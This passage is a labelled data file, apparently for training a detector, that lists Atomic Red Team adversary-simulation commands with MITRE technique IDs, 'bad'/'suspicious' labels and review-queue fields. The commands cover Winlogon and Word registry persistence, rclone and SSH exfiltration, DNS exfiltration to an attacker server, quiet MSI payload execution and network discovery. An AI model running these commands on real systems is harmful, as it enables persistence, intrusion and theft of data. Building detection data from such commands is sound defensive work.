required.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 96cd1d7c016158e6307f6eea,reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options /v STARTUP-PATH /f,reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options /v STARTUP-PATH /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546/T1546.yaml,Persistence using STARTUP-PATH in MS-WORD,T1546,"[""T1546""]",windows,0.55,True,"When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\\Word\Options\STARTUP-PATH and if it exists, it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx The registry key can be abused to load malware from the mentioned path. Reboot might be required.",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d27083493f4bd645e9a4f40e,"import-module ""PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1"" $Password = ConvertTo-SecureString -String ""#{password}"" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $Password Connect-AzAccount -Credential $Credential | out-null Get-AzDomainInfo -folder #{output_directory} -subscription ""#{subscription_name}"" -verbose","import-module ""PathToAtomicsFolder\..\ExternalPayloads\Get-AzDomainInfo.ps1"" $Password = ConvertTo-SecureString -String ""#{password}"" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $Password Connect-AzAccount -Credential $Credential | out-null Get-AzDomainInfo -folder #{output_directory} -subscription ""#{subscription_name}"" -verbose",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1526/T1526.yaml,Azure - Dump Subscription Data with MicroBurst,T1526,"[""T1526""]",iaas:azure,0.9,False,"Upon successful execution, this test will enumerate all resources that are contained within a valid Azure subscription. The resources enumerated will display on screen, as well as several csv files and folders will be output to a specified directory, listing what resources were discovered by the script. See https://dev.to/cheahengsoon/enumerating-subscription-information-with-microburst-35a1 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d1bac54bfc238a85148b2235,remove-item #{output_directory} -recurse -force -erroraction silentlycontinue,remove-item #{output_directory} -recurse -force -erroraction silentlycontinue,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1526/T1526.yaml,Azure - Dump Subscription Data with MicroBurst,T1526,"[""T1526""]",iaas:azure,0.55,True,"Upon successful execution, this test will enumerate all resources that are contained within a valid Azure subscription. The resources enumerated will display on screen, as well as several csv files and folders will be output to a specified directory, listing what resources were discovered by the script. See https://dev.to/cheahengsoon/enumerating-subscription-information-with-microburst-35a1 ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 17b7037ba0b72296e999af8e,"Import-Module ""PathToAtomicsFolder\T1526\src\AWSDiscovery.ps1"" $access_key = ""#{access_key}"" $secret_key = ""#{secret_key}"" $session_token = ""#{session_token}"" $aws_profile = ""#{profile}"" $regions = ""#{regions}"" Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile Get-AWSDiscoveryData -Regions $regions -OutputDirectory ""#{output_directory}"" Remove-BlankFiles -OutputDirectory ""#{output_directory}""","Import-Module ""PathToAtomicsFolder\T1526\src\AWSDiscovery.ps1"" $access_key = ""#{access_key}"" $secret_key = ""#{secret_key}"" $session_token = ""#{session_token}"" $aws_profile = ""#{profile}"" $regions = ""#{regions}"" Set-AWSAuthentication -AccessKey $access_key -SecretKey $secret_key -SessionToken $session_token -AWSProfile $aws_profile Get-AWSDiscoveryData -Regions $regions -OutputDirectory ""#{output_directory}"" Remove-BlankFiles -OutputDirectory ""#{output_directory}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1526/T1526.yaml,AWS - Enumerate common cloud services,T1526,"[""T1526""]",iaas:aws,0.9,False,"Upon successful execution, this test will enumerate common resources that are contained within a valid AWS account. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fb6df3c50f7ae2d286bb7e85,"Import-Module ""PathToAtomicsFolder\T1526\src\AzureDiscovery.ps1"" $client_id = ""#{client_id}"" $client_secret = ""#{client_secret}"" $tenant_id = ""#{tenant_id}"" $environment = ""#{cloud}"" Set-AzureAuthentication -ClientID $client_id -ClientSecret $client_secret -TenantID $tenant_id -Environment $environment Get-AzureDiscoveryData -OutputDirectory ""#{output_directory}"" -Environment $environment Remove-BlankFiles -OutputDirectory ""#{output_directory}""","Import-Module ""PathToAtomicsFolder\T1526\src\AzureDiscovery.ps1"" $client_id = ""#{client_id}"" $client_secret = ""#{client_secret}"" $tenant_id = ""#{tenant_id}"" $environment = ""#{cloud}"" Set-AzureAuthentication -ClientID $client_id -ClientSecret $client_secret -TenantID $tenant_id -Environment $environment Get-AzureDiscoveryData -OutputDirectory ""#{output_directory}"" -Environment $environment Remove-BlankFiles -OutputDirectory ""#{output_directory}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1526/T1526.yaml,Azure - Enumerate common cloud services,T1526,"[""T1526""]",iaas:azure,0.9,False,"Upon successful execution, this test will enumerate common resources that are contained within a valid Azure subscription. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 96fdc34f726207304f472ac3,"New-Item #{rclone_config_path}\rclone -ItemType directory New-Item #{rclone_config_path}\rclone\rclone.conf cd ""#{rclone_path}"" .\rclone.exe config create #{remote_share} mega set-Content #{rclone_config_path}\rclone\rclone.conf ""[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"" .\rclone.exe copy --max-size 1700k ""#{dir_to_copy}"" #{remote_share}:test -v","New-Item #{rclone_config_path}\rclone -ItemType directory New-Item #{rclone_config_path}\rclone\rclone.conf cd ""#{rclone_path}"" .\rclone.exe config create #{remote_share} mega set-Content #{rclone_config_path}\rclone\rclone.conf ""[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"" .\rclone.exe copy --max-size 1700k ""#{dir_to_copy}"" #{remote_share}:test -v",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1567.002/T1567.002.yaml,Exfiltrate data with rclone to cloud Storage - Mega (Windows),T1567.002,"[""T1567.002""]",windows,0.9,False,"This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e068a41bd2e7764f9b9674ae,"cd ""#{rclone_path}"" .\rclone.exe purge #{remote_share}:test .\rclone.exe config delete #{remote_share}: Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue cd c:\ Remove-Item ""PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"" Remove-Item ""PathToAtomicsFolder\..\ExternalPayloads\T1567.002"" -recurse -force","cd ""#{rclone_path}"" .\rclone.exe purge #{remote_share}:test .\rclone.exe config delete #{remote_share}: Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue cd c:\ Remove-Item ""PathToAtomicsFolder\..\ExternalPayloads\rclone.zip"" Remove-Item ""PathToAtomicsFolder\..\ExternalPayloads\T1567.002"" -recurse -force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1567.002/T1567.002.yaml,Exfiltrate data with rclone to cloud Storage - Mega (Windows),T1567.002,"[""T1567.002""]",windows,0.55,True,"This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b191d5ff9b1171b972f5a52e,"Write-Host ""Destroying AWS infrastructure... "" -NoNewLine $awsAccessKey = ""#{aws_access_key}"" $awsSecretKey = ""#{aws_secret_key}"" cd PathToAtomicsFolder/T1567.002/src/ if ($awsAccessKey -eq """" -or $awsSecretKey -eq """") { $env:AWS_PROFILE = ""#{aws_profile}"" } else { $env:AWS_ACCESS_KEY_ID = ""$awsAccessKey"" $env:AWS_SECRET_ACCESS_KEY = ""$awsSecretKey"" } $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var ""aws_region=#{aws_region}"" -auto-approve Write-Host ""Done!""","Write-Host ""Destroying AWS infrastructure... "" -NoNewLine $awsAccessKey = ""#{aws_access_key}"" $awsSecretKey = ""#{aws_secret_key}"" cd PathToAtomicsFolder/T1567.002/src/ if ($awsAccessKey -eq """" -or $awsSecretKey -eq """") { $env:AWS_PROFILE = ""#{aws_profile}"" } else { $env:AWS_ACCESS_KEY_ID = ""$awsAccessKey"" $env:AWS_SECRET_ACCESS_KEY = ""$awsSecretKey"" } $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var ""aws_region=#{aws_region}"" -auto-approve Write-Host ""Done!""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1567.002/T1567.002.yaml,Exfiltrate data with rclone to cloud Storage - AWS S3,T1567.002,"[""T1567.002""]","linux,macos",0.55,True,"This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 68823e8b34caa03e48e0ca63,ipconfig /all netsh interface show interface arp -a nbtstat -n net config,ipconfig /all netsh interface show interface arp -a nbtstat -n net config,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,System Network Configuration Discovery on Windows,T1016,"[""T1016""]",windows,0.9,False,"Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7bef5b4ec8c554ec3e386f0e,netsh advfirewall firewall show rule name=all,netsh advfirewall firewall show rule name=all,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,List Windows Firewall Rules,T1016,"[""T1016""]",windows,0.9,False,"Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 544af4dd432673d5922ca267,"if [ ""$(uname)"" = 'FreeBSD' ]; then cmd=""netstat -Sp tcp""; else cmd=""netstat -ant""; fi; if [ -x ""$(command -v arp)"" ]; then arp -a; else echo ""arp is missing from the machine. skipping...""; fi; if [ -x ""$(command -v ifconfig)"" ]; then ifconfig; else echo ""ifconfig is missing from the machine. skipping...""; fi; if [ -x ""$(command -v ip)"" ]; then ip addr; else echo ""ip is missing from the machine. skipping...""; fi; if [ -x ""$(command -v netstat)"" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo ""netstat is missing from the machine. skipping...""; fi;","if [ ""$(uname)"" = 'FreeBSD' ]; then cmd=""netstat -Sp tcp""; else cmd=""netstat -ant""; fi; if [ -x ""$(command -v arp)"" ]; then arp -a; else echo ""arp is missing from the machine. skipping...""; fi; if [ -x ""$(command -v ifconfig)"" ]; then ifconfig; else echo ""ifconfig is missing from the machine. skipping...""; fi; if [ -x ""$(command -v ip)"" ]; then ip addr; else echo ""ip is missing from the machine. skipping...""; fi; if [ -x ""$(command -v netstat)"" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo ""netstat is missing from the machine. skipping...""; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,System Network Configuration Discovery,T1016,"[""T1016""]","macos,linux",0.9,False,"Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1b9196e16e987718aaa74893,ipconfig /all net config workstation net view /all /domain nltest /domain_trusts,ipconfig /all net config workstation net view /all /domain nltest /domain_trusts,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,System Network Configuration Discovery (TrickBot Style),T1016,"[""T1016""]",windows,0.9,False,"Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 343b52a3b9c45f3ec768512f,"Remove-Item -ErrorAction ignore ""#{output_file}""","Remove-Item -ErrorAction ignore ""#{output_file}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,List Open Egress Ports,T1016,"[""T1016""]",windows,0.55,True,"This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f8d2d40d7703dcf6ff05543a,"""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -f (objectcategory=subnet) #{optional_args}","""PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"" -f (objectcategory=subnet) #{optional_args}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,Adfind - Enumerate Active Directory Subnet Objects,T1016,"[""T1016""]",windows,0.9,False,"Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bad2824e918e39727f74273b,sudo defaults read /Library/Preferences/com.apple.alf sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate,sudo defaults read /Library/Preferences/com.apple.alf sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,List macOS Firewall Rules,T1016,"[""T1016""]",macos,0.9,False,"""This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\""Is it on or off?\""), `firewall` for common application allow rules, and `ex",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e80726ac2593d29b3ad17de4,nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%,nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1016/T1016.yaml,DNS Server Discovery Using nslookup,T1016,"[""T1016""]",windows,0.9,False,"Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 37f84603b277bcbc3d051cc3,"connect-mggraph -Scopes AppRoleAssignment.ReadWrite.All,Application.ReadWrite.All,User.Read -NoWelcome Remove-MgApplication $app.AppId Remove-Item -Path Cert:\CurrentUser\My\$($cert.thumbprint) -DeleteKey Disconnect-MgGraph","connect-mggraph -Scopes AppRoleAssignment.ReadWrite.All,Application.ReadWrite.All,User.Read -NoWelcome Remove-MgApplication $app.AppId Remove-Item -Path Cert:\CurrentUser\My\$($cert.thumbprint) -DeleteKey Disconnect-MgGraph",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1114.002/T1114.002.yaml,Office365 - Remote Mail Collected,T1114.002,"[""T1114.002""]",office-365,0.55,True,"Create and register an entra application that downloads emails from a tenant's Office 365 mailboxes using the Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2a073974a99c1d577812c9bb,"#{msi_exe} /q /#{action} ""#{msi_payload}""","#{msi_exe} /q /#{action} ""#{msi_payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.007/T1218.007.yaml,Msiexec.exe - Execute Local MSI file with embedded JScript,T1218.007,"[""T1218.007""]",windows,0.9,False,"Executes an MSI containing embedded JScript code using msiexec.exe ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9be3adbb95da4af63e3c8186,Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' },Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' },bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.007/T1218.007.yaml,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,T1218.007,"[""T1218.007""]",windows,0.9,False,"Executes an MSI containing embedded JScript code using the WMI Win32_Product class ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8102b7e900f4427e8e3b5965,"#{msi_exe} /y ""#{dll_payload}""","#{msi_exe} /y ""#{dll_payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.007/T1218.007.yaml,Msiexec.exe - Execute the DllRegisterServer function of a DLL,T1218.007,"[""T1218.007""]",windows,0.9,False,"Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the ""bin"" folder is only built for 64-bit, so this won't work on a 32-bit OS. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 92c5aaf0739fabe80e71ad9a,"#{msi_exe} /z ""#{dll_payload}""","#{msi_exe} /z ""#{dll_payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.007/T1218.007.yaml,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,T1218.007,"[""T1218.007""]",windows,0.9,False,"Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the ""bin"" folder is only built for 64-bit, so this won't work on a 32-bit OS. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eac3b0837ff72c9f5d82c93a,"#{msi_exe} /q /i ""#{msi_payload}""","#{msi_exe} /q /i ""#{msi_payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.007/T1218.007.yaml,Msiexec.exe - Execute Remote MSI file,T1218.007,"[""T1218.007""]",windows,0.9,False,"Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e30701334e5ddc998c975b16,"Set-ItemProperty ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Shell"" ""explorer.exe, #{binary_to_execute}"" -Force","Set-ItemProperty ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Shell"" ""explorer.exe, #{binary_to_execute}"" -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon Shell Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.9,False,"PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8581cb7b34566ff248177787,"Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Shell"" -Force -ErrorAction Ignore","Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Shell"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon Shell Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.55,True,"PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 49a0aa7be258c5c3ba0a3e53,"Set-ItemProperty ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Userinit"" ""Userinit.exe, #{binary_to_execute}"" -Force","Set-ItemProperty ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Userinit"" ""Userinit.exe, #{binary_to_execute}"" -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon Userinit Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.9,False,"PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 031dcf9a9df1d92f480e6090,"Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Userinit"" -Force -ErrorAction Ignore","Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Userinit"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon Userinit Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.55,True,"PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d83fafb1458d24285199d182,"Remove-Item ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" -Force -ErrorAction Ignore","Remove-Item ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon Notify Key Logon Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.55,True,"PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon. Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a5d09e51afade79d0348c808,"Set-ItemProperty ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Shell"" ""explorer.exe, #{binary_to_execute}"" -Force","Set-ItemProperty ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Shell"" ""explorer.exe, #{binary_to_execute}"" -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon HKLM Shell Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.9,False,"PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a01600ff974b538f5d9e78ef,"Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Shell"" -Force -ErrorAction Ignore","Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Shell"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon HKLM Shell Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.55,True,"PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ae36766fb408a783256f6f7,"Set-ItemProperty ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Userinit"" ""Userinit.exe, #{binary_to_execute}"" -Force","Set-ItemProperty ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" ""Userinit"" ""Userinit.exe, #{binary_to_execute}"" -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon HKLM Userinit Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.9,False,"PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5de06ad5e7d630bb7942fcf0,"Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Userinit"" -Force -ErrorAction Ignore","Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"" -Name ""Userinit"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.004/T1547.004.yaml,Winlogon HKLM Userinit Key Persistence - PowerShell,T1547.004,"[""T1547.004""]",windows,0.55,True,"PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 553dabe5b19776d891fb255c,"ssh #{domain} ""(cd /etc && tar -zcvf - *)"" > ./etc.tar.gz","ssh #{domain} ""(cd /etc && tar -zcvf - *)"" > ./etc.tar.gz",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1048/T1048.yaml,Exfiltration Over Alternative Protocol - SSH,T1048,"[""T1048""]","macos,linux",0.9,False,"Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f5063fd02c340ac4b5fbfa0f,tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc',tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc',bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1048/T1048.yaml,Exfiltration Over Alternative Protocol - SSH,T1048,"[""T1048""]","macos,linux",0.9,False,"Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7949cfc5af34c4a468e5b76c,"Import-Module ""#{ps_module}"" Invoke-DNSExfiltrator -i ""#{ps_module}"" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}","Import-Module ""#{ps_module}"" Invoke-DNSExfiltrator -i ""#{ps_module}"" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1048/T1048.yaml,DNSExfiltration (doh),T1048,"[""T1048""]",windows,0.9,False,"DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. !!! Test will fail without a domain under your control with A record and NS record !!! See this github page for more details - https://github.com/Arno0x/DNSExfiltrator ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33f78d05ea6673727a4df395,"dig @#{attacker_dns_server} -p #{dns_port} $(echo ""#{secret_info}"" | base64).google.com","dig @#{attacker_dns_server} -p #{dns_port} $(echo ""#{secret_info}"" | base64).google.com",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1048/T1048.yaml,Exfiltrate Data using DNS Queries via dig,T1048,"[""T1048""]","macos,linux",0.9,False,"This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and making DNS queries via the dig command to a controlled DNS server. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fd923ae7b5c6ee20ce0df98e,"reg query ""HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"" /v svcVersion","reg query ""HKEY_LOCAL_MACHINE\Software\Microsoft\Internet 